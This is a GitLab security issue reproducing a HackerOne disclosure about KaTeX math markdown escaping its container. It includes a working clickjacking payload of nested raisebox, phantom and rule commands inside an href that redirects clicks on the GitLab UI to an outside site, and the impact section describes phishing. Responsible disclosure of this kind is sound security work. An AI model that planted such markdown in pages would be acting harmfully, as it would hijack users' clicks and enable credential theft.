Math rendering in markdown can escape container and hijack clicks
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1887323 by ammar2
on 2023-02-25, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
Summary
KaTeX based math rendering in Markdown has various features for adjusting the positioning of math elements on screen. Some of these directives can be exploited to escape the usual markdown rendering container and create elements in unexpected parts of the page. This coupled with \href{}
command allows an attacker to hijack some links and buttons on the GitLab UI.
Steps to reproduce
- Go to any system that allows you to render markdown, editing a README, creating an issue etc.
- Paste the following markdown code:
```math
\hskip{-200pt}
\href{http://ammaraskar.com}{
\smash{\raisebox{20em}{$
\smash{
\raisebox{20em}{$\phantom{
\underset{
\underset{
\underset{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}
}{
\underset{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}
}
}{
\underset{
\underset{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}
}{
\underset{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}{
\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}\rule{20em}{20em}
}
}
}
}
$}
}
$}}
}
```
- Clicking almost any UI element in the center panel will bring the user to an attacker controlled website.
Impact
See impact section at the end.
Examples
I have a reproducer on GitLab.com but the repo visibility is private to prevent anyone from discovering the exploit:
Please let me know if I should add someone to the repo to help triage or if I should export the repo.
What is the current bug behavior?
Markdown renders outside the bounds of what a user would expect, allowing them to easily hijack clicks to GitLab UI elements.
What is the expected correct behavior?
All markdown rendering should be constrained to the expected area and not be able to affect other parts of the page.
Relevant logs and/or screenshots
I have attached a video demonstrating the click-jacking. There is also screenshots without the \phantom
element demonstrating the elements rendered to the page.
Output of checks
This bug happens on GitLab.com
Impact
An attacker can exploit this attack on any README, a comment on a bug, or anywhere else markdown+math are rendered. A popular bug report's comment would be a good target.
Once a user loads the page, clicking on any UI elements will take them to an attacker controlled page. Here, the attacker can try to imitate the GitLab UI and try to phish for credentials. Unless a user is carefully looking at their URL bar, they might not notice they have been redirected to an attacker's website.
While the naive attack demonstrated above makes one big click-box, one can imagine a more convincing attack would be to place more targeted rectangles on each clickable area with the right target page.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: